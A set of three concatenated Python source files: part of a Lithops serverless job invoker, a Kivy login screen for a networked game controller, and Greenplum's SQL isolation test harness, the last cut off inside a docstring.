def select_runtime(self, job_id, runtime_memory):
"""
Return the runtime metadata
"""
if self.mode == SERVERLESS:
runtime_memory = runtime_memory or self.config[self.backend].get('runtime_memory')
runtime_timeout = self.config[self.backend].get('runtime_timeout')
elif self.mode == STANDALONE:
runtime_memory = None
runtime_timeout = self.config[STANDALONE]['hard_dismantle_timeout']
elif self.mode == LOCALHOST:
runtime_memory = None
runtime_timeout = None
msg = ('ExecutorID {} | JobID {} - Selected Runtime: {} '
.format(self.executor_id, job_id, self.runtime_name))
msg = msg+'- {}MB'.format(runtime_memory) if runtime_memory else msg
logger.info(msg)
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
msg = 'Runtime {}'.format(self.runtime_name)
msg = msg+' with {}MB'.format(runtime_memory) if runtime_memory else msg
logger.info(msg+' is not yet installed')
runtime_meta = self.compute_handler.create_runtime(self.runtime_name, runtime_memory, runtime_timeout)
runtime_meta['runtime_timeout'] = runtime_timeout
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
# Verify python version and lithops version
if lithops_version != runtime_meta['lithops_version']:
raise Exception("Lithops version mismatch. Host version: {} - Runtime version: {}"
.format(lithops_version, runtime_meta['lithops_version']))
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_version']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
def _create_payload(self, job):
"""
Creates the default pyload dictionary
"""
payload = {'config': self.config,
'chunksize': job.chunksize,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'total_calls': job.total_calls,
'execution_timeout': job.execution_timeout,
'data_byte_ranges': job.data_byte_ranges,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_key': job.job_key,
'max_workers': self.max_workers,
'call_ids': None,
'host_submit_tstamp': time.time(),
'lithops_version': lithops_version,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory,
'worker_processes': job.worker_processes}
return payload
def _run_job(self, job):
"""
Run a job
"""
if self.customized_runtime:
logger.debug('ExecutorID {} | JobID {} - Customized runtime activated'
.format(job.executor_id, job.job_id))
job.runtime_name = self.runtime_name
extend_runtime(job, self.compute_handler, self.internal_storage)
self.runtime_name = job.runtime_name
logger.info('ExecutorID {} | JobID {} - Starting function '
'invocation: {}() - Total: {} activations'
.format(job.executor_id, job.job_id,
job.function_name, job.total_calls))
logger.debug('ExecutorID {} | JobID {} - Worker processes: {} - Chunksize: {}'
.format(job.executor_id, job.job_id, job.worker_processes, job.chunksize))
self.prometheus.send_metric(
name='job_total_calls',
value=job.total_calls,
type='counter',
labels=(
('job_id', job.job_key),
('function_name', job.function_name)
)
)
self.prometheus.send_metric(
name='job_runtime_memory',
value=job.runtime_memory or 0,
type='counter',
labels=(
('job_id', job.job_key),
('function_name', job.function_name)
)
)
try:
job.runtime_name = self.runtime_name
self._invoke_job(job)
except (KeyboardInterrupt, Exception) as e:
self.stop()
raise e
log_file = os.path.join(LOGS_DIR, job.job_key+'.log')
logger.info("ExecutorID {} | JobID {} - View execution logs at {}"
.format(job.executor_id, job.job_id, log_file))
# Create all futures
futures = []
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
fut = ResponseFuture(call_id, job,
job.metadata.copy(),
self.storage_config)
fut._set_state(ResponseFuture.State.Invoked)
futures.append(fut)
job.futures = futures
return futures
def stop(self):
"""
Stop invoker-related processes
"""
pass
class BatchInvoker(Invoker):
"""
Module responsible to perform the invocations against a batch backend
"""
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
super().__init__(config, executor_id, internal_storage, compute_handler, job_monitor)
self.compute_handler.init()
def _invoke_job(self, job):
"""
Run a job
"""
payload = self._create_payload(job)
payload['call_ids'] = ["{:05d}".format(i) for i in range(job.total_calls)]
start = time.time()
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
logger.debug('ExecutorID {} | JobID {} - Job invoked ({}s) - Activation ID: {}'
.format(job.executor_id, job.job_id, resp_time, activation_id or job.job_key))
def run_job(self, job):
"""
Run a job
"""
# Ensure only self.max_workers are started
total_workers = job.total_calls // job.chunksize + (job.total_calls % job.chunksize > 0)
if self.max_workers < total_workers:
job.chunksize = job.total_calls // self.max_workers + (job.total_calls % self.max_workers > 0)
# Perform the invocation
futures = self._run_job(job)
self.job_monitor.start(futures)
return futures
class FaaSInvoker(Invoker):
"""
Module responsible to perform the invocations against a FaaS backend
"""
ASYNC_INVOKERS = 2
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
super().__init__(config, executor_id, internal_storage, compute_handler, job_monitor)
remote_invoker = self.config[self.backend].get('remote_invoker', False)
self.remote_invoker = remote_invoker if not is_lithops_worker() else False
self.invokers = []
self.ongoing_activations = 0
self.pending_calls_q = queue.Queue()
self.should_run = False
self.sync = is_lithops_worker()
invoke_pool_threads = self.config[self.backend]['invoke_pool_threads']
self.executor = ThreadPoolExecutor(invoke_pool_threads)
logger.debug('ExecutorID {} - Serverless invoker created'.format(self.executor_id))
def _start_async_invokers(self):
"""Starts the invoker process responsible to spawn pending calls
in background.
"""
def invoker_process(inv_id):
"""Run process that implements token bucket scheduling approach"""
logger.debug('ExecutorID {} - Async invoker {} started'
.format(self.executor_id, inv_id))
with ThreadPoolExecutor(max_workers=250) as executor:
while self.should_run:
try:
self.job_monitor.token_bucket_q.get()
job, call_ids_range = self.pending_calls_q.get()
except KeyboardInterrupt:
break
if self.should_run:
executor.submit(self._invoke_task, job, call_ids_range)
else:
break
logger.debug('ExecutorID {} - Async invoker {} finished'
.format(self.executor_id, inv_id))
for inv_id in range(self.ASYNC_INVOKERS):
p = threading.Thread(target=invoker_process, args=(inv_id,))
self.invokers.append(p)
p.daemon = True
p.start()
def stop(self):
"""
Stop async invokers
"""
if self.invokers:
logger.debug('ExecutorID {} - Stopping async invokers'
.format(self.executor_id))
self.should_run = False
while not self.pending_calls_q.empty():
try:
self.pending_calls_q.get(False)
except Exception:
pass
for invoker in self.invokers:
self.job_monitor.token_bucket_q.put('$')
self.pending_calls_q.put((None, None))
self.invokers = []
def _invoke_task(self, job, call_ids_range):
"""Method used to perform the actual invocation against the
compute backend.
"""
# prepare payload
payload = self._create_payload(job)
call_ids = ["{:05d}".format(i) for i in call_ids_range]
payload['call_ids'] = call_ids
if job.data_key:
data_byte_ranges = [job.data_byte_ranges[int(call_id)] for call_id in call_ids]
payload['data_byte_ranges'] = data_byte_ranges
else:
del payload['data_byte_ranges']
payload['data_byte_strs'] = [job.data_byte_strs[int(call_id)] for call_id in call_ids]
# do the invocation
start = time.time()
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
# reached quota limit
time.sleep(random.randint(0, 5))
self.pending_calls_q.put((job, call_ids_range))
self.job_monitor.token_bucket_q.put('#')
return
logger.debug('ExecutorID {} | JobID {} - Calls {} invoked ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, ', '.join(call_ids),
resp_time, activation_id))
def _invoke_job_remote(self, job):
"""
Logic for invoking a job using a remote function
"""
start = time.time()
payload = {}
payload['config'] = self.config
payload['log_level'] = self.log_level
payload['runtime_name'] = job.runtime_name
payload['runtime_memory'] = job.runtime_memory
payload['remote_invoker'] = True
payload['job'] = job.__dict__
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if activation_id:
logger.debug('ExecutorID {} | JobID {} - Remote invoker call done ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, resp_time, activation_id))
else:
raise Exception('Unable to spawn remote invoker')
def _invoke_job(self, job):
"""
Normal Invocation
Use local threads to perform all the function invocations
"""
if self.remote_invoker:
return self._invoke_job_remote(job)
if self.should_run is False:
self.running_workers = 0
self.should_run = True
self._start_async_invokers()
if self.running_workers < self.max_workers:
free_workers = self.max_workers - self.running_workers
total_direct = free_workers * job.chunksize
callids = range(job.total_calls)
callids_to_invoke_direct = callids[:total_direct]
callids_to_invoke_nondirect = callids[total_direct:]
ci = len(callids_to_invoke_direct)
cz = job.chunksize
consumed_workers = ci // cz + (ci % cz > 0)
self.running_workers += consumed_workers
logger.debug('ExecutorID {} | JobID {} - Free workers:'
' {} - Going to run {} activations in {} workers'
.format(job.executor_id, job.job_id, free_workers,
len(callids_to_invoke_direct), consumed_workers))
def _callback(future):
future.result()
invoke_futures = []
for call_ids_range in iterchunks(callids_to_invoke_direct, job.chunksize):
future = self.executor.submit(self._invoke_task, job, call_ids_range)
future.add_done_callback(_callback)
invoke_futures.append(future)
if self.sync:
[f.result() for f in invoke_futures]
# Put into the queue the rest of the callids to invoke within the process
if callids_to_invoke_nondirect:
logger.debug('ExecutorID {} | JobID {} - Putting remaining '
'{} function activations into pending queue'
.format(job.executor_id, job.job_id,
len(callids_to_invoke_nondirect)))
for call_ids_range in iterchunks(callids_to_invoke_nondirect, job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
else:
logger.debug('ExecutorID {} | JobID {} - Reached maximum {} '
'workers, queuing {} function activations'
.format(job.executor_id, job.job_id,
self.max_workers, job.total_calls))
for call_ids_range in iterchunks(range(job.total_calls), job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
def run_job(self, job):
"""
Run a job
"""
futures = self._run_job(job)
self.job_monitor.start(
fs=futures,
job_id=job.job_id,
chunksize=job.chunksize,
generate_tokens=True
)
return futures
def extend_runtime(job, compute_handler, internal_storage):
"""
This method is used when customized_runtime is active
"""
base_docker_image = job.runtime_name
uuid = job.ext_runtime_uuid
ext_runtime_name = "{}:{}".format(base_docker_image.split(":")[0], uuid)
# update job with new extended runtime name
job.runtime_name = ext_runtime_name
runtime_key = compute_handler.get_runtime_key(job.runtime_name, job.runtime_memory)
runtime_meta = internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
logger.info('Creating runtime: {}, memory: {}MB'.format(ext_runtime_name, job.runtime_memory))
ext_docker_file = '/'.join([job.local_tmp_dir, "Dockerfile"])
# Generate Dockerfile extended with function dependencies and function
with open(ext_docker_file, 'w') as df:
df.write('\n'.join([
'FROM {}'.format(base_docker_image),
'ENV PYTHONPATH=/tmp/lithops/modules:$PYTHONPATH',
# set python path to point to dependencies folder
'COPY . /tmp/lithops'
]))
# Build new extended runtime tagged by function hash
cwd = os.getcwd()
os.chdir(job.local_tmp_dir)
compute_handler.build_runtime(ext_runtime_name, ext_docker_file)
os.chdir(cwd)
shutil.rmtree(job.local_tmp_dir, ignore_errors=True)
runtime_meta = compute_handler.create_runtime(ext_runtime_name, job.runtime_memory, job.runtime_timeout)
runtime_meta['runtime_timeout'] = job.runtime_timeout
internal_storage.put_runtime_meta(runtime_key, runtime_meta)
# Verify python version and lithops version
if lithops_version != runtime_meta['lithops_version']:
raise Exception("Lithops version mismatch. Host version: {} - Runtime version: {}"
.format(lithops_version, runtime_meta['lithops_version']))
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_version']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(job.runtime_name, py_remote_version, py_local_version))
|
login.py
|
from kivy.metrics import dp
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from kivy.clock import Clock
import socket
from threading import Thread
Builder.load_string("""
#:import IconInput uix.inputs.IconInput
#:import ButtonEffect uix.buttons.ButtonEffect
#:import ButtonIcon uix.icons.ButtonIcon
#:import icon utils.icon
#:import background utils.background
<Login>:
AnchorLayout:
anchor_x: 'center'
anchor_y: 'center'
canvas:
Color:
rgba:mid_gray
Rectangle:
size:self.size
pos:self.pos
BoxLayout:
orientation:'vertical'
id:box_principal
size_hint:None,None
size:root.width/1.8, root.height/1.1
on_size:root.size_login(self, args[1])
canvas:
Color:
rgba:light_gray
RoundedRectangle:
size: self.size
pos: self.pos
radius:[dp(20), dp(20), dp(20), dp(20)]
FloatLayout:
size_hint: None, None
size: 0, 0
ButtonIcon:
pos: (root.width-(self.width*2), root.height-(self.height*2))
icon_source: icon('skip')
on_press: root.manager.current = 'gamepad'
AnchorLayout:
Label:
text:'Login'
font_size:'30sp'
AnchorLayout:
size_hint_y:None
height:'140dp'
on_size:
self.padding= [self.width/9,dp(10),self.width/9,10] if \
self.width >= dp(600) else [dp(20),dp(10),dp(20),dp(10)]
BoxLayout:
orientation:'vertical'
spacing:'10dp'
IconInput:
id: input
radius: [dp(8), dp(8), dp(8), dp(8)]
icon_left_source: icon('user')
icon_left_size: [dp(30), dp(25)]
label_text: 'Username'
label_pos_color: green
on_enter: root.start_thread_login()
IconInput:
radius: [dp(8), dp(8), dp(8), dp(8)]
icon_left_source: icon('password')
icon_left_size: [dp(30), dp(25)]
icon_right_state_sources: [icon('unsee_eye'), icon('see_eye')]
icon_right_color_pos: green
icon_right_effect_color: clear_white
icon_right_size: [dp(30), dp(32)]
label_pos_color: green
hide:
True if self.ids.button_right.state == 'normal' else False
label_text: 'Password'
AnchorLayout:
size_hint_y:None
height:'50dp'
BoxLayout:
size_hint_x:None
width:'130dp'
CheckBox:
size_hint_x:0.18
id:r_check
Button:
background_color: [1, 1, 1, 0]
text: 'Lembrar Senha'
on_press:
r_check.active = True if r_check.active == False else False
AnchorLayout:
padding:[dp(10),dp(20),dp(10),1]
size_hint_y:None
height:'60dp'
ButtonEffect:
text:'Entrar'
size_hint_x:None
width:'150dp'
background_color: [0, 0, 0, 0]
color_line: [clear_white, white]
color_effect: light_gray
radius: [dp(15), dp(15), dp(15), dp(15)]
on_press: root.start_thread_login()
Widget:
size_hint_y:0.3
AnchorLayout:
size_hint_y:None
height:'40dp'
ButtonEffect:
size_hint_x: None
width: '200dp'
text: 'Esqueceu sua senha?'
color_text: [white, green]
color_line: [0, 0, 0, 0]
effect_color: [0, 0, 0, 0]
Widget:
size_hint_y:0.3
""")
class Login(Screen):
can_call_thread = False
gamepad = ObjectProperty(None)
def on_init_input(self, *args):
self.manager.current = 'gamepad'
def start_thread_login(self, *args):
if self.can_call_thread:
return None
username = self.ids.input.ids.input.text
if not username:
return None
self.can_call_thread = True
self.gamepad.username = username
th = Thread(target=self.login_game)
th.start()
def login_game(self, *args):
sucessfull = True
gmp = self.gamepad
esp = gmp.connect_to_esp(force=True)
if gmp.conn is None:
gmp.start_server()
if esp is None or gmp.conn is None:
self.can_call_thread = False
self.gamepad.username = ''
return False
try:
esp.send(f'{gmp.index_player}:np:{gmp.username}:{gmp.HOST}:{gmp.PORT}\n'.encode('utf-8'))
print('Iniciou!!')
Clock.schedule_once(self.gamepad.start_game, 0.5)
except (ConnectionAbortedError, socket.timeout, TimeoutError):
sucessfull = False
if sucessfull:
try:
values = esp.recv(1024).decode('utf-8').strip("\n").split(":")
except socket.timeout:
values = []
print(values)
if len(values) < 2:
sucessfull = False
elif values[0] == "erro":
sucessfull = False
elif values[0] == "start":
# values[1::] == INDEX, LIFES
username = self.ids.input.ids.input.text
self.gamepad.username = username
self.gamepad.index_player = int(values[1])
self.gamepad.lifes = int(values[2])
else:
self.gamepad.username = ''
self.gamepad.close_connection_esp(esp)
self.can_call_thread = False
def size_login(self, box, size):
w, h = size
if w <= dp(340):
box.width = self.width/1.2
if h >= dp(650):
box.height = h/1.25
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
def load_helper_file(helper_file):
with open(helper_file) as file:
return "".join(file.readlines()).strip()
def parse_include_statement(sql):
include_statement, command = sql.split(None, 1)
stripped_command = command.strip()
if stripped_command.endswith(";"):
return stripped_command.replace(";", "")
else:
raise SyntaxError("expected 'include: %s' to end with a semicolon." % stripped_command)
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>UIq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close();
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.rstrip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print >>self.out_file, " <... completed>"
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.rstrip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_session_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pygresql.pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname)
else:
con = pygresql.pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname)
break
except Exception as e:
if (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
return con
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
contentid = name and role = primary
"""
con = self.connectdb(self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE content = %s and role = 'p'" % name).getresult()
if len(r) == 0:
raise Exception("Invalid content %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
# Print out a pygresql result set (a Query object, after the query
# has been executed), in a format that imitates the default
# formatting of psql. This isn't a perfect imitation: we left-justify
# all the fields and headers, whereas psql centers the header, and
# right-justifies numeric fields. But this is close enough, to make
# gpdiff.pl recognize the result sets as such. (We used to just call
# str(r), and let PyGreSQL do the formatting. But even though
# PyGreSQL's default formatting is close to psql's, it's not close
# enough.)
def printout_result(self, r):
widths = []
# Figure out the widths of each column.
fields = r.listfields()
for f in fields:
widths.append(len(str(f)))
rset = r.getresult()
for row in rset:
colno = 0
for col in row:
if col is None:
col = ""
widths[colno] = max(widths[colno], len(str(col)))
colno = colno + 1
# Start printing. Header first.
result = ""
colno = 0
for f in fields:
if colno > 0:
result += "|"
result += " " + f.ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Then the bar ("----+----")
colno = 0
for f in fields:
if colno > 0:
result += "+"
result += "".ljust(widths[colno] + 2, "-")
colno = colno + 1
result += "\n"
# Then the result set itself
for row in rset:
colno = 0
for col in row:
if colno > 0:
result += "|"
if col is None:
col = ""
result += " " + str(col).ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Finally, the row count
if len(rset) == 1:
result += "(1 row)\n"
else:
result += "(" + str(len(rset)) +" rows)\n"
return result
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, r)
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, utility_mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print >> output_file
if mode == '\\retcode':
print >> output_file, '-- start_ignore'
print >> output_file, stdout
if mode == '\\retcode':
print >> output_file, '-- end_ignore'
print >> output_file, '(exited with code {})'.format(cmd_output.returncode)
elif sql.startswith('include:'):
helper_file = parse_include_statement(sql)
self.get_process(
output_file,
process_name,
dbname=dbname
).query(
load_helper_file(helper_file)
)
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, utility_mode=True, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
else:
command_part = line.partition("--")[0] # remove comment from line
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^-?\d+U[q\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections). In 'U' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode query on the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
I: include a file of sql statements (useful for loading reusable functions)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
Including files:
-- example contents for file.sql: create function some_test_function() returning void ...
include: path/to/some/file.sql;
select some_helper_function();
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
